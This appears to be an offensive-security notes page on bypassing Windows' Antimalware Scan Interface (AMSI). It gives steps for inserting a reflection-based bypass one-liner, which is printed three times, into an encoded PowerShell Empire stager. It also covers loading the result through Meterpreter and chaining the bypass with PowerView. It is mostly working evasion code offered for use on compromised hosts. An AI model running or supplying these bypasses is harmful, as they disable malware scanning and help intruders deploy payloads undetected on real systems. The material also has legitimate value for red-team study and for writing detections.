AMSI Bypasses

AMSI Bypass with Powershell Empire

This assumes you have access to a powershell prompt on the target machine
Generate a stager, will look something like this:
On empire must set Bypasses None

powershell -noP -sta -w 1 -enc  SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0
--snip--

Take out the powershell so it is only base64 and decode, will look something like this

If($PSVersionTable.PSVersion.Major -ge 3){};[System.Net.ServicePointManager]::
--snip--

Notice the If($PSVersionTable.PSVersion.Major -ge 3){};
Take the AMSI Bypass below and input it in between { } in the empire payload

$s = [Ref].Assembly.GetTypes();ForEach($b in $s) {if ($b.Name -like "*iUtils") {$c = $b}};$d = $c.GetFields('NonPublic,Static');ForEach($e in $d) {if ($e.Name -like "*Failed") {$f = $e}};$f.SetValue($null,$true);

Save off to a file locally check.ps1
Paste contents into powershell prompt

MSF Meterpreter way

go to meterpreter and run:
load powershell
powershell_import /path/to/file/created.ps1

AMSI Bypass without Additional Payload

Can generate many AMSI Bypassess on https://amsi.fail
Simply paste into powershell prompt.
If successful AMSI is patched and the rest of your session will not be scanned by AMSI

AMSI Bypass stacking with Powershell

Can do an session AMSI bypass by pasting command in powershell prompt

Or you can also stack it with a specific command

PreviousWindows Defender Nextpktmon Packet Capture Windows

Last updated 2 years ago

$s = [Ref].Assembly.GetTypes();ForEach($b in $s) {if ($b.Name -like "*iUtils") {$c = $b}};$d = $c.GetFields('NonPublic,Static');ForEach($e in $d) {if ($e.Name -like "*Failed") {$f = $e}};$f.SetValue($null,$true);

$s = [Ref].Assembly.GetTypes();ForEach($b in $s) {if ($b.Name -like "*iUtils") {$c = $b}};$d = $c.GetFields('NonPublic,Static');ForEach($e in $d) {if ($e.Name -like "*Failed") {$f = $e}};$f.SetValue($null,$true); .\PowerView.ps1